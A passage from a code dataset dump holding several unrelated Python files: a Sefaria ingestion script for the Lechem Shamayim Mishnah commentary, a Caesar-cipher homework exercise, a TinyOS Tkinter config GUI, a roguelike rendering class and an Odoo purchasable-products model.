= 0\n mishna_index = 0\n segment_index = 0\n continue\n elif '@00' in line and \"פרק\" in line:\n # perek_index += 1\n perek_index = compute_gematria(extract_last_word(line))\n mishna_index = 0\n segment_index = 0\n elif '@22' in line:\n # mishna_index += 1\n mishna_index = compute_gematria(extract_last_word(line))\n segment_index = 0\n else:\n if line in {\"\", \" \", \" \"}:\n continue\n segment_index +=1\n ref_string = ref_generator(masechet_index, perek_index, mishna_index, segment_index)\n text_dict[ref_string] = line\n return text_dict\n\n\ndef parse_text(text):\n lines = text.split('\\n')\n return lines\ndef filter_dictionary_by_string(dictionary, string):\n filtered_dict = {}\n\n for key, value in dictionary.items():\n if string in key:\n filtered_dict[key] = value\n\n return filtered_dict\ndef ingest_version(map_text):\n # vs = VersionState(index=library.get_index(\"Introductions to the Babylonian Talmud\"))\n # vs.delete()\n # print(\"deleted version state\")\n # def filter_dictionary_by_string(dictionary, string):\n # filtered_dict = {}\n #\n # for key, value in dictionary.items():\n # if string in key:\n # filtered_dict[key] = value\n #\n # return filtered_dict\n\n for masechet in masechtot:\n # if masechet == 'Berakhot':\n # continue\n masechet_map = filter_dictionary_by_string(map_text, masechet)\n print(\"ingesting masechet \"+ masechet)\n\n\n index = library.get_index('Lechem Shamayim on Mishnah '+ masechet)\n cur_version = VersionSet({'title': 'Lechem Shamayim on Mishnah '+ masechet})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleting existing version\")\n chapter = index.nodes.create_skeleton()\n version = Version({\"versionTitle\": \"Jerusalem, 1978\",\n \"versionSource\": \"https://www.nli.org.il/he/books/NNL_ALEPH990012730190205171/NLI\",\n \"title\": 'Lechem Shamayim on Mishnah '+ masechet,\n \"language\": \"he\",\n \"chapter\": chapter,\n \"digitizedBySefaria\": True,\n \"license\": \"PD\",\n \"status\": \"locked\"\n })\n modify_bulk_text(superuser_id, version, masechet_map)\n\ndef read_docx(file_path):\n doc = docx.Document(file_path)\n text = []\n for paragraph in doc.paragraphs:\n text.append(paragraph.text)\n return '\\n'.join(text)\n\ndef create_index_dict(masechet_name_en, masechet_name_he):\n node = JaggedArrayNode()\n # addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n node.sectionNames = ['Chapter', 'Mishnah', 'Comment']\n node.add_structure(['Chapter', 'Mishnah', 'Comment'])\n node.addressTypes = ['Perek', 'Mishnah', 'Integer']\n # node.key = 'Lechem Shamayim on Mishna' + masechet_name_en\n node.add_primary_titles('Lechem Shamayim on Mishnah ' + masechet_name_en, 'לחם שמים על משנה '+ masechet_name_he)\n node.validate()\n\n index_dict = {'title': 'Lechem Shamayim on Mishnah '+ masechet_name_en,\n 'categories': ['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim', 'Seder ' + seder],\n \"schema\": node.serialize(),\n # 'schema': {'nodeType': 'JaggedArrayNode', 'depth': 3, 'addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n # 'titles': [{'lang': 'he', 'text': 'לחם שמים על '+ masechet_name_he, 'primary': True},\n # {'text': 'Lechem Shamayim on ' + masechet_name_en, 'lang': 'en', 'primary': True}],\n # 'key': 'Lechem Shamayim on '+ masechet_name_en},\n 'authors': ['yaakov-emden'],\n 'enDesc': \"Commentary of R' Yaakov Emden on Mishnah.\", 'heDesc': \"ביאור לר' יעקב עמדין על המשנה.\",\n 'pubDate': '1728', 'compDate': '1725', 'pubPlace': 'Altona', 'errorMargin': '3', 'era': 'AH',\n 'dependence': 'Commentary',\n 'base_text_titles': ['Mishnah ' + masechet_name_en],\n 'base_text_mapping': None,\n 'collective_title': 'Lechem Shamayim'}\n return index_dict\ndef post_indices():\n from sources.functions import post_index, post_text\n for masechet_en, masechet_he in zip(masechtot, masechtot_he):\n index = create_index_dict(masechet_en, masechet_he)\n post_index(index)\n # post_index(index, server=\"https://lechemshamayim.cauldron.sefaria.org\") #, server = \"https://piaseczno.cauldron.sefaria.org\"\ndef post_intro_index():\n from sources.functions import post_index\n\n index_dict = {'title': 'Lechem Shamayim, Introduction to Mishnah Commentary',\n 'categories': ['Mishnah', 'Acharonim on Mishnah', 'Lechem Shamayim'],\n \"schema\": {\"nodeType\": \"JaggedArrayNode\", \"depth\": 1, \"addressTypes\": [\"Integer\"], \"sectionNames\": [\"Paragraph\"], \"titles\": [{\"primary\": True, \"lang\": \"en\", \"text\": \"Lechem Shamayim, Introduction to Mishnah Commentary\"}, {\"primary\": True, \"lang\": \"he\", \"text\": \"לחם שמים, הקדמה לפירוש המשנה\"},], \"key\": \"Lechem Shamayim, Introduction to Mishnah Commentary\"},\n # 'schema': {'nodeType': 'JaggedArrayNode', 'depth': 3, 'addressTypes': ['Perek', 'Mishnah', 'Integer'], 'sectionNames': ['Chapter', 'Mishnah', 'Comment'],\n # 'titles': [{'lang': 'he', 'text': 'לחם שמים על '+ masechet_name_he, 'primary': True},\n # {'text': 'Lechem Shamayim on ' + masechet_name_en, 'lang': 'en', 'primary': True}],\n # 'key': 'Lechem Shamayim on '+ masechet_name_en},\n 'authors': ['yaakov-emden'],\n # 'enDesc': \"Commentary of R' Yaakov Emden on Mishnah.\", 'heDesc': \"ביאור לר' יעקב עמדין על המשנה.\",\n 'pubDate': '1728', 'compDate': '1725', 'pubPlace': 'Altona', 'errorMargin': '3', 'era': 'AH',\n 'collective_title': 'Lechem Shamayim'}\n post_index(index_dict, server=\"https://lechemshamayim.cauldron.sefaria.org\")\ndef prettify_version(text_object):\n def add_bold_tags(text):\n # Add tags before @11\n text = re.sub(r'(@11)', r'\\1', text)\n\n # Add tags before @33\n text = re.sub(r'(@33)', r'\\1', text)\n\n # Add tags before @44\n text = re.sub(r'(@44)', r'\\1', text)\n\n # Add tags before @55\n text = re.sub(r'(@55)', r'\\1', text)\n\n\n\n return text\n\n def remove_at_and_digits(text):\n cleaned_text = re.sub(r'[@\\d]', '', text)\n return cleaned_text\n\n for ref, line in text_object.items():\n line = add_bold_tags(line)\n line = remove_at_and_digits(line)\n text_object[ref] = line\n\ndef extract_integers(string):\n pattern = r'\\d+'\n matches = re.findall(pattern, string)\n integers = [int(match) for match in matches]\n return integers\ndef validate_document(file_path):\n def find_misplaced_endings(strings):\n\n misplaced_indexes = []\n last_ending = None\n last_cardinal_tuple = (0,0,0)\n for i, string in enumerate(strings):\n ending = extract_integers(string)\n cardinal_tuple = (ending[0], ending[1], ending[2])\n\n\n if last_cardinal_tuple and cardinal_tuple < last_cardinal_tuple:\n misplaced_indexes.append(i)\n last_cardinal_tuple = cardinal_tuple\n\n return misplaced_indexes\n\n def get_key_value_by_index(dictionary, index):\n items = list(dictionary.items())\n if 0 <= index < len(items):\n return items[index]\n else:\n raise IndexError(\"Index out of range\")\n\n docx_text = read_docx(file_path)\n parsed_version = parse_text(docx_text)\n text_obj = create_text_object(parsed_version)\n # prettify_version(text_obj)\n\n for masechet in masechtot:\n masechet_map = filter_dictionary_by_string(text_obj, masechet)\n refs_in_order = list(masechet_map.keys())\n misplaced = find_misplaced_endings(refs_in_order)\n for index in misplaced:\n print(\"mismatches masechet \" + masechet)\n ref, text = get_key_value_by_index(masechet_map, index)\n print(ref + \" :\")\n print(text)\n\ndef parse_and_ingest_intro(file_path):\n docx_text = read_docx(file_path)\n lines = docx_text.split('\\n')\n lines = [line for line in lines if line != '']\n intro_map = {}\n for index, line in enumerate(lines):\n # Add tags before @11\n if '@22' in line:\n line = '' + line + ''\n # Add tags before @11\n line = re.sub(r'(@11)', r'\\1', line)\n\n # Add tags before @33\n line = re.sub(r'(@33)', r'\\1', line)\n\n # Add tags before @44\n line = re.sub(r'(@44)', r'\\1', line)\n\n # Add tags before @55\n line = re.sub(r'(@55)', r'\\1', line)\n\n line = re.sub(r'[@\\d]', '', line)\n intro_map[\"Lechem Shamayim, Introduction to Mishnah Commentary \"+ str(index+1)] = line\n index = library.get_index('Lechem Shamayim, Introduction to Mishnah Commentary')\n cur_version = VersionSet({'title': 'Lechem Shamayim, Introduction to Mishnah Commentary'})\n if cur_version.count() > 0:\n cur_version.delete()\n print(\"deleting existing version\")\n chapter = index.nodes.create_skeleton()\n version = Version({\"versionTitle\": \"Jerusalem, 1978\",\n \"versionSource\": \"https://www.nli.org.il/he/books/NNL_ALEPH990012730190205171/NLI\",\n \"title\": 'Lechem Shamayim, Introduction to Mishnah Commentary',\n \"language\": \"he\",\n \"chapter\": chapter,\n \"digitizedBySefaria\": True,\n \"license\": \"PD\",\n \"status\": \"locked\"\n })\n modify_bulk_text(superuser_id, version, intro_map)\n\ndef handle_mishne(file_path_mishne, file_path_lechem):\n docx_text_mishne = read_docx(file_path_mishne)\n parsed_version_mishne = parse_text(docx_text_mishne)\n text_obj_mishne = create_text_object(parsed_version_mishne)\n prettify_version(text_obj_mishne)\n\n docx_text = read_docx(file_path_lechem)\n parsed_version = parse_text(docx_text)\n text_obj = create_text_object(parsed_version)\n prettify_version(text_obj)\n\n def find_key_and_max_last_integer(dictionary, prefix):\n matched_keys = [key for key in dictionary if key.startswith(prefix)]\n matched_keys_with_integer = [key for key in matched_keys if key[len(prefix):].split(':')[-1].isdigit()]\n\n if not matched_keys_with_integer:\n return None, 0\n\n max_key = max(matched_keys_with_integer, key=lambda key: int(key[len(prefix):].split(':')[-1]))\n max_integer = int(max_key[len(prefix):].split(':')[-1])\n return max_key, max_integer\n\n for key in text_obj_mishne:\n prefix = key.split(':')[0]+':'\n print(prefix)\n a,b = find_key_and_max_last_integer(text_obj, prefix)\n mishne_lechem_string = \"משנה לחם\"\n text_obj[prefix+str(b+1)] = \"\" + mishne_lechem_string + \"
\" + text_obj_mishne[key].rstrip() + \"
\"\n\n ingest_version(text_obj)\n\ndef add_links():\n\n def list_of_dict_to_links(dicts):\n list_of_dicts = []\n for d in dicts:\n list_of_dicts.append(Link(d))\n return list_of_dicts\n\n def clean_links(masechet):\n query = {\"refs\": {\"$regex\": \"Lechem Shamayim on Mishnah \"+ masechet }}\n list_of_links = LinkSet(query).array()\n for l in list_of_links:\n print(\"deleted link!\")\n l.delete()\n def insert_links_to_db(list_of_links):\n for l in list_of_links:\n l.save()\n def delete_until_last_colon(s):\n if ':' in s:\n s = s[:s.rindex(':')]\n return s\n\n def delete_until_first_digit(s):\n for i in range(len(s)):\n if s[i].isdigit():\n return s[i:]\n\n def check_bold_period(text):\n text = text.replace(\" \", \"\")\n if text.startswith(\"\") and \"\" in text and text.index(\"
\") + len(\"\") < len(text) and text[\n text.index(\"\") + len(\"\")].strip() == '.':\n return True\n if text.startswith(\"\") and \"\" in text and text.index(\"\") + len(\"\") < len(text) and text[\n text.index(\"\") -1].strip() == '.':\n return True\n else:\n return False\n\n # def get_bold_substring(text):\n # start_tag = \"\"\n # end_tag = \"\"\n # start_index = text.find(start_tag)\n # if start_index != -1:\n # start_index += len(start_tag)\n # end_index = text.find(end_tag, start_index)\n # if end_index != -1:\n # return text[start_index:end_index]\n # return None\n def extract_dibbur(input_string):\n substring = input_string\n # Find the index of the first period\n # period_index = input_string.find('.')\n # if period_index != -1:\n # # Extract the substring until the first period\n # substring = input_string[:period_index]\n # etc_index = input_string.find(\"וכו'\")\n # if etc_index != -1:\n # # Extract the substring until the first period\n # substring = input_string[:etc_index]\n # etc_index2 = input_string.find(\"כו'\")\n # if etc_index2 != -1:\n # # Extract the substring until the first period\n # substring = input_string[:etc_index2]\n bold_index = input_string.find('')\n if bold_index != -1:\n # Extract the substring until the first period\n substring = input_string[:bold_index]\n\n\n # Remove '' and '' from the substring\n substring = substring.replace('', '').replace('', '')\n\n return substring\n\n\n def is_likely_quoted(s1, s2):\n s1_length = len(s1)\n s2_length = len(s2)\n # if s1_length == 0:\n # return False\n\n if s1_length >= s2_length:\n return False\n\n for i in range(s2_length - s1_length + 1):\n sub_s2 = s2[i:i + s1_length]\n\n distance = Levenshtein.distance(s1, sub_s2)\n similarity = 1 - (distance / s1_length)\n\n if similarity >= 0.7: # Adjust this threshold as needed\n return True\n\n return False\n def start_new_sequence(tref, corresponding_mishnah_tref):\n\n\n seg_num = extract_integers(tref)[-1]\n if seg_num == 1:\n return True\n text = Ref(tref).text('he').text\n\n if \"אבל מניחה לגת הבאה\" in text:\n a = 8\n\n\n if \"משנה לחם\" in text:\n return True\n if check_bold_period(text.strip()):\n return True\n if not text.startswith(''):\n False\n # if \"$\" in text or text == '':\n # return False\n\n suspected_dibbur = extract_dibbur(text)\n if suspected_dibbur == None:\n return False\n suspected_dibbur = suspected_dibbur.strip()\n suspected_base_text = Ref(corresponding_mishnah_tref).text('he', \"Mishnah, ed. Romm, Vilna 1913\").text.strip()\n if is_likely_quoted(suspected_dibbur, suspected_base_text):\n return True\n\n else:\n return False\n\n\n\n\n\n\n auto_links = []\n\n for masechet in masechtot:\n # masechet_name = get_last_two_words(index)\n print(\"Linking Masechet \"+ masechet)\n clean_links(masechet)\n\n segment_refs = Ref(\"Lechem Shamayim on Mishnah \"+ masechet).all_segment_refs()\n trefs_sequence = []\n previous_tref_chapter = 0\n for seg_ref in segment_refs:\n current_tref_chapter = extract_integers(seg_ref.tref)[0]\n corresponding_mishnah_tref = \"Mishnah \" + masechet + ' ' + delete_until_first_digit(delete_until_last_colon(seg_ref.tref))\n\n\n if current_tref_chapter != previous_tref_chapter or start_new_sequence(seg_ref.tref, corresponding_mishnah_tref):\n if trefs_sequence:\n extended_tref = Ref(trefs_sequence[0]).to(Ref(trefs_sequence[-1])).tref\n auto_links.append(\n {\n \"refs\": [\n extended_tref,\n \"Mishnah \" + masechet + ' ' + delete_until_first_digit(delete_until_last_colon(trefs_sequence[-1]))\n ],\n \"type\": \"Commentary\",\n \"auto\": True\n }\n )\n trefs_sequence.clear()\n trefs_sequence.append(seg_ref.tref)\n else:\n trefs_sequence.append(seg_ref.tref)\n previous_tref_chapter = current_tref_chapter\n if trefs_sequence:\n extended_tref = Ref(trefs_sequence[0]).to(Ref(trefs_sequence[-1])).tref\n auto_links.append(\n {\n \"refs\": [\n extended_tref,\n corresponding_mishnah_tref\n ],\n \"type\": \"Commentary\",\n \"auto\": True\n }\n )\n\n\n\n auto_links = list_of_dict_to_links(auto_links)\n insert_links_to_db(auto_links)\n\n\nif __name__ == '__main__':\n print(\"hello world\")\n # add_new_categories()ii\n file_path = \"lechem_nashim.docx\"\n # post_indices()\n #\n # docx_text = read_docx(file_path)\n # parsed_version = parse_text(docx_text)\n # text_obj = create_text_object(parsed_version)\n # prettify_version(text_obj)\n # ingest_version(text_obj)\n # handle_mishne(\"mishne_zeraim.docx\", \"lechem_zeraim.docx\")\n\n\n\n # \"Guide for the Perplexed, Part 1 2:7\"\n # ingest_nodes()\n\n # obj = create_text_object()\n # print(obj)\n # ingest_version(obj)\n # add_new_categories()\n # validate_document(\"mishne_moed.docx\")\n\n # post_intro_index()\n # parse_and_ingest_intro(\"lechem_intro.docx\")\n\n add_links()\n\n\n\n\n\n\n\n\n","sub_path":"sources/lechem_shamayim/ingest_lechem.py","file_name":"ingest_lechem.py","file_ext":"py","file_size_in_byte":24373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"565907324","text":"# Structure this script entirely on your own.\n# See Chapter 8: Strings Exercise 5 for the task.\n# Please do provide function calls that test/demonstrate your\n# function.\n\ndef rotate_word(strEncode, intRotate):\n\t# initialise the output variable\n\toutput = ''\n\n\t# check if the intRotate is negative, if yes then convert it to positive by taking the mod\n\tif(intRotate < 0):\n\t\tintRotate = intRotate % 26\n\n\t# loop through the entire string and populate the output variable by appending the rotated characters\n\tfor strCharacter in strEncode:\n\t\tif(ord(strCharacter) >= 65 and ord(strCharacter) <= 90):\n\t\t\toutput += chr(65 + ((ord(strCharacter) + intRotate) % 65) % 26)\n\t\telif(ord(strCharacter) >= 97 and ord(strCharacter) <= 122):\n\t\t\toutput += chr(97 + ((ord(strCharacter) + intRotate) % 97) % 26)\n\t\telse:\n\t\t\toutput += strCharacter\n\n\treturn output\n\ndef main():\n\n\tprint(\"The program will ask you to input a String to encrypt and a number to rotate the string. To end, type an empty string\\n\")\n\twhile True:\n\t\tusrInput = input(\"Enter A String To Encrypt: \")\n\t\tif(usrInput == ''):\n\t\t\tbreak\n\t\tnumRotate = int(input(\"Enter A Number: \"))\n\n\t\tprint(\"The Encrypted String Is:\", rotate_word(usrInput, numRotate) + \"\\n\")\n\nif __name__ == '__main__':\n\tmain()","sub_path":"HW04_ch08_ex05.py","file_name":"HW04_ch08_ex05.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"511424410","text":"from Tkinter import *\nfrom config import *\nfrom pickle import *\n\nclass Gui:\n font = \"6x13\"\n\n def labeledEntry(self, title):\n title = title + \":\"\n l = Label(self.frame, text=title, font=self.font)\n l.grid(row=self.row, sticky=E)\n e = Entry(self.frame, font=self.font)\n e.grid(row=self.row, column=1)\n self.row = self.row + 1\n return (e, l)\n\n def configLabel(self, title, field, isint=1):\n (entry, label) = self.labeledEntry(title)\n entry.insert(END, config.__dict__[field])\n self.fields[field] = (entry, isint, title, label)\n\n def blankRow(self):\n msg = Label(self.frame, text=\"\", font=self.font)\n msg.grid(row=self.row, columnspan=2)\n self.row = self.row + 1\n return msg\n\n def choices(self, list, current):\n v = IntVar()\n cframe = Frame(self.frame)\n cframe.grid(row=self.row, columnspan=2)\n self.row = self.row + 1\n idx = 1\n for choice in list:\n rb = Radiobutton(cframe, text=choice[0], command=choice[1], value=idx)\n rb.grid(row=0, column=idx)\n if idx == current:\n rb.select()\n idx = idx + 1\n\n def defs(self):\n config = Config()\n for field in self.fields.keys():\n entry = self.fields[field][0]\n entry.delete(0, END)\n entry.insert(END, config.__dict__[field])\n \n def save(self):\n for field in self.fields.keys():\n (entry, isint, title, label) = self.fields[field]\n val = entry.get()\n if isint:\n try:\n val = int(val)\n except:\n self.msg.config(text=title + \" must be an integer\")\n return\n config.__dict__[field] = val\n \n cf = open(\"field.config\", \"w+\")\n dump(config, cf)\n cf.close()\n self.root.quit()\n return\n\n def configField(self, name, newState):\n self.fields[name][0].config(state=newState)\n # Not all versions support state on labels\n if newState == DISABLED:\n colour = \"darkgrey\"\n else:\n colour = \"black\"\n self.fields[name][3].config(fg=colour)\n\n def choose_ser(self):\n config.use_ip = 0\n #self.configField(\"sf_port\", DISABLED)\n\n def choose_ip(self):\n config.use_ip = 1\n #self.configField(\"sf_port\", NORMAL)\n\n def __init__(self, root):\n self.row = 0\n self.fields = {}\n self.root = root\n self.frame = Frame(root)\n self.frame.pack()\n \n root.title(\"Field Configuration\")\n self.choices(((\"Serial\", self.choose_ser), (\"IP\", self.choose_ip)), config.use_ip + 1)\n self.configLabel(\"Host/Serial\", \"sf_host\", 0)\n self.configLabel(\"Port/Baud\", \"sf_port\")\n self.configLabel(\"Group\", \"group\")\n self.configLabel(\"Local Id\", \"local_id\")\n self.configLabel(\"Msg Size\", \"msg_size\")\n self.blankRow()\n self.configLabel(\"Command Period\", \"send_period\")\n self.configLabel(\"Command Count\", \"send_count\")\n self.configLabel(\"Wakeup Period\", \"wakeup_period\")\n self.configLabel(\"Mote Timeout\", \"mote_timeout\")\n self.msg = self.blankRow()\n bframe = Frame(self.frame)\n bframe.grid(row=self.row, columnspan=2)\n Button(bframe, text=\"Save\", command=self.save).grid(row=0, column=0)\n Button(bframe, text=\"Defaults\", command=self.defs).grid(row=0, column=1)\n Button(bframe, text=\"Cancel\", command=root.quit).grid(row=0, column=2)\n\n if config.use_ip:\n self.choose_ip()\n else:\n self.choose_ser()\n \nroot = Tk()\nGui(root)\nroot.mainloop()\n","sub_path":"tinyos-1.x/tools/java/net/tinyos/task/field/config-gui.py","file_name":"config-gui.py","file_ext":"py","file_size_in_byte":3345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"49484682","text":"import tdl\nfrom clubsandwich.geom import Point, Size\nfrom clubsandwich.ui import RectView\n\nfrom ui.camera import Camera\nfrom util.cursor import Cursor\n\n\nclass GameWindow(RectView):\n def __init__(self, game_context, **kwargs):\n super().__init__(fill=True, **kwargs)\n self.game_context = game_context\n player = self.game_context.player\n self.camera = Camera(location=player.location.copy(), screen_size=Size(120, 30))\n self.camera.character_focus = player\n\n def draw(self, ctx):\n player = self.game_context.player\n current_level = player.location.level\n self.camera.focus_on_game_object()\n self.set_tiles_background_color(ctx)\n\n player_x = player.location.local_x\n player_y = player.location.local_y\n\n def is_transparent_callback(x, y):\n if x <= 0 or y <= 0:\n return False\n return self.is_transparent(current_level, x, y)\n\n player.fov = tdl.map.quickFOV(player_x, player_y, is_transparent_callback, 'basic')\n\n # NB: Order in which things are render is important\n self.draw_map(player.fov, ctx)\n self.draw_items(player, ctx)\n self.draw_characters(player, ctx)\n self.draw_player(player, ctx)\n\n def draw_map(self, viewer_fov, ctx):\n current_level = self.camera.location.level\n\n for x, y in viewer_fov:\n if not x >= len(current_level.maze) and not y >= len(current_level.maze[x]):\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n current_level.maze[x][y].display.get_draw_info()\n )\n current_level.maze[x][y].is_explored = True\n\n def draw_items(self, player, ctx):\n current_level = self.camera.location.level\n for item in current_level.spawned_items:\n x, y = item.location.get_local_coords()\n if (x, y) in player.fov:\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n item.display.get_draw_info()\n )\n\n def draw_characters(self, player, ctx):\n # draw monsters\n current_level = self.camera.location.level\n for monster in current_level.spawned_monsters:\n x, y = monster.location.get_local_coords()\n if (x, y) in player.fov:\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n ctx.printf(\n relative_point,\n monster.display.get_draw_info()\n )\n\n def draw_player(self, player, ctx):\n relative_point = self.camera.transform(Point(*player.location.get_local_coords()))\n if relative_point is not None:\n ctx.printf(relative_point, player.display.get_draw_info())\n\n if isinstance(self.camera.character_focus, Cursor):\n cursor = self.camera.character_focus\n relative_point = self.camera.transform(Point(*cursor.location.get_local_coords()))\n if relative_point is not None:\n ctx.printf(relative_point, cursor.display.get_draw_info())\n\n def set_tiles_background_color(self, ctx):\n # TODO Instead of using a different color, we should darken whatever color it is.\n # TODO Allowing us to use many colors as walls and tiles to create levels with different looks.\n current_level = self.camera.location.level\n for y in range(current_level.height):\n for x in range(current_level.width):\n relative_point = self.camera.transform(Point(x, y))\n if relative_point is not None:\n tile = current_level.maze[x][y]\n wall = tile.block_sight\n ground = tile.is_ground\n\n if tile.is_explored:\n if wall:\n ctx.printf(relative_point, '[color=gray]#')\n elif ground:\n ctx.printf(relative_point, '[color=gray].')\n\n @staticmethod\n def is_transparent(current_level, x, y):\n \"\"\"\n Used by map.quickFOV to determine which tile fall within the players \"field of view\"\n \"\"\"\n try:\n # Pass on IndexErrors raised for when a player gets near the edge of the screen\n # and tile within the field of view fall out side the bounds of the maze.\n tile = current_level.maze[x][y]\n if tile.block_sight and tile.is_blocked:\n return False\n else:\n return True\n except IndexError:\n return False\n","sub_path":"scenes/game/windows/game_window.py","file_name":"game_window.py","file_ext":"py","file_size_in_byte":4901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"375120523","text":"# -*- coding: utf-8 -*-\n# © 2017 Pharmadus I.T.\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).\n\nfrom openerp import models, fields, api\nfrom datetime import datetime\nimport time\n\n\nclass PurchasableProducts(models.TransientModel):\n _name = 'purchasable.products'\n _inherits = {'product.product': 'product_id'}\n _rec_name = 'product_id'\n\n request_id = fields.Integer()\n partner_id = fields.Many2one(comodel_name='res.partner')\n partner_ref = fields.Char(related='partner_id.ref', readonly=True)\n product_id = fields.Many2one(string='Product',\n comodel_name='product.product', required=True,\n ondelete='cascade', readonly=True)\n supplier_ref = fields.Char(string='Supplier reference', readonly=True)\n qty_current_year = fields.Float(digits=(16,2), string='Current year qty.')\n price_current_year = fields.Float(digits=(16,2), string='Current year amount')\n qty_last_year = fields.Float(digits=(16,2), string='Last year qty.')\n price_last_year = fields.Float(digits=(16,2), string='Last year amount')\n qty_year_before = fields.Float(digits=(16,2), string='Year before qty.')\n price_year_before = fields.Float(digits=(16,2), string='Year before amount')\n qty_other_years = fields.Float(digits=(16,2), string='Other years qty.')\n price_other_years = fields.Float(digits=(16,2), string='Other years amount')\n price_list_member = fields.Boolean(string='Price list member?')\n price_list_ids = fields.One2many(comodel_name='pricelist.partnerinfo',\n compute='_get_price_lists',\n readonly=True)\n invoice_line_ids = fields.One2many(comodel_name='account.invoice.line',\n compute='_get_invoices_lines',\n readonly=True)\n\n @api.one\n def _get_price_lists(self):\n self.price_list_ids = self.env['pricelist.partnerinfo'].search([\n ('suppinfo_id.product_tmpl_id', '=', self.product_id.product_tmpl_id.id)\n ])\n\n @api.one\n def _get_invoices_lines(self):\n self.invoice_line_ids = self.env['account.invoice.line'].search([\n ('product_id', '=', self.product_id.id),\n ('invoice_id.type', 'in', ('in_invoice', 'in_refund')),\n ('invoice_id.state', '!=', 'cancel'),\n ('invoice_id.date_invoice', '!=', False)\n ])\n\n @api.model\n def _get_products(self, partner_id):\n if not partner_id.supplier:\n return False\n\n inv_lines = self.env['account.invoice.line'].search([\n ('invoice_id.commercial_partner_id', '=', partner_id.id),\n ('invoice_id.type', 'in', ('in_invoice', 'in_refund')),\n ('invoice_id.state', '!=', 'cancel'),\n ('invoice_id.date_invoice', '!=', False)\n ])\n\n price_lists = self.env['product.supplierinfo'].search([\n ('name', '=', partner_id.id)\n ])\n\n if not inv_lines:\n return False\n\n # Unique id for domain filtering\n request_id = int(round(time.time()))\n\n products = {}\n product_data = {\n 'request_id': request_id,\n 'partner_id': False,\n 'product_id': False,\n 'supplier_ref': '',\n 'qty_current_year': 0,\n 'price_current_year': 0,\n 'qty_last_year': 0,\n 'price_last_year': 0,\n 'qty_year_before': 0,\n 'price_year_before': 0,\n 'qty_other_years': 0,\n 'price_other_years': 0,\n 'price_list_member': False\n }\n\n current_year = datetime.now().year\n for ail in inv_lines:\n year_idx = current_year - \\\n fields.Date.from_string(ail.invoice_id.date_invoice).year\n prod_idx = ail.product_id.id\n if prod_idx not in products:\n products[prod_idx] = dict(product_data)\n products[prod_idx]['partner_id'] = partner_id.id\n products[prod_idx]['product_id'] = ail.product_id.id\n pl = price_lists.filtered(lambda r:\n r.product_tmpl_id ==\n ail.product_id.product_tmpl_id)\n products[prod_idx]['supplier_ref'] = pl.product_code if pl else ''\n\n sign = -1 if ail.invoice_id.type == 'in_refund' else 1\n\n if year_idx == 0:\n products[prod_idx]['qty_current_year'] += ail.quantity * sign\n products[prod_idx]['price_current_year'] += ail.price_subtotal * sign\n elif year_idx == 1:\n products[prod_idx]['qty_last_year'] += ail.quantity * sign\n products[prod_idx]['price_last_year'] += ail.price_subtotal * sign\n elif year_idx == 2:\n products[prod_idx]['qty_year_before'] += ail.quantity * sign\n products[prod_idx]['price_year_before'] += ail.price_subtotal * sign\n else:\n products[prod_idx]['qty_other_years'] += ail.quantity * sign\n products[prod_idx]['price_other_years'] += ail.price_subtotal * sign\n\n for pl in price_lists:\n if pl.product_tmpl_id.product_variant_count > 0:\n prod_idx = pl.product_tmpl_id.product_variant_ids[0].id\n if prod_idx not in products:\n products[prod_idx] = dict(product_data)\n products[prod_idx]['partner_id'] = partner_id.id\n products[prod_idx]['product_id'] = prod_idx\n products[prod_idx]['supplier_ref'] = pl.product_code\n products[prod_idx]['price_list_member'] = True\n\n for prod_idx in products:\n self.create(products[prod_idx])\n\n return request_id\n\n @api.multi\n def view_product_price_lists_and_invoices(self):\n view_id = self.env.ref('custom_views.purchasable_products_form_view').id\n\n return {\n 'type': 'ir.actions.act_window',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': view_id,\n 'res_model': 'purchasable.products',\n 'res_id': self.id,\n 'target': 'new',\n 'context': self.env.context,\n }\n\n @api.model\n def search(self, args, offset=0, limit=None, order=None, count=False):\n if self.env.context.get('show_all_suppliers', False):\n # Unique id for domain filtering\n request_id = int(round(time.time()))\n\n self.env.cr.execute(\"\"\"\n insert into purchasable_products (request_id, partner_id, supplier_ref,\n product_id, create_uid, create_date, write_uid, write_date)\n select distinct\n {1:d} as request_id,\n suppliers.partner_id,\n rp.ref,\n suppliers.product_id,\n {0:d} as create_uid,\n current_date as create_date,\n {0:d} as write_uid,\n current_date as write_date \n from (\n select distinct\n ai.commercial_partner_id \"partner_id\",\n ail.product_id \"product_id\"\n from account_invoice ai\n join account_invoice_line ail on ail.invoice_id = ai.id\n join product_product pp on pp.id = ail.product_id and pp.active\n where ai.company_id = 1\n and ai.date_invoice is not null\n and ai.state != 'cancel'\n and ai.type in ('in_invoice', 'in_refund')\n \n union\n \n select distinct\n ps.name \"partner_id\",\n pp.id \"product_id\"\n from product_supplierinfo ps\n join product_product pp on pp.product_tmpl_id = ps.product_tmpl_id and pp.active\n where ps.company_id = 1\n and ps.active_supplier\n ) as suppliers\n join res_partner rp on rp.id = suppliers.partner_id and rp.active\n \"\"\".format(self.env.user.id, request_id))\n args.append(('request_id', '=', request_id))\n\n return super(PurchasableProducts, self).search(args, offset=offset,\n limit=limit, order=order,\n count=count)","sub_path":"project-addons/custom_views/models/purchasable_products.py","file_name":"purchasable_products.py","file_ext":"py","file_size_in_byte":8750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"345710525","text":"import datetime\n\nfrom flask import render_template, url_for, flash, redirect, request\nfrom flask_login import current_user, login_user, logout_user\n\nfrom app import app, db\nfrom app.forms import 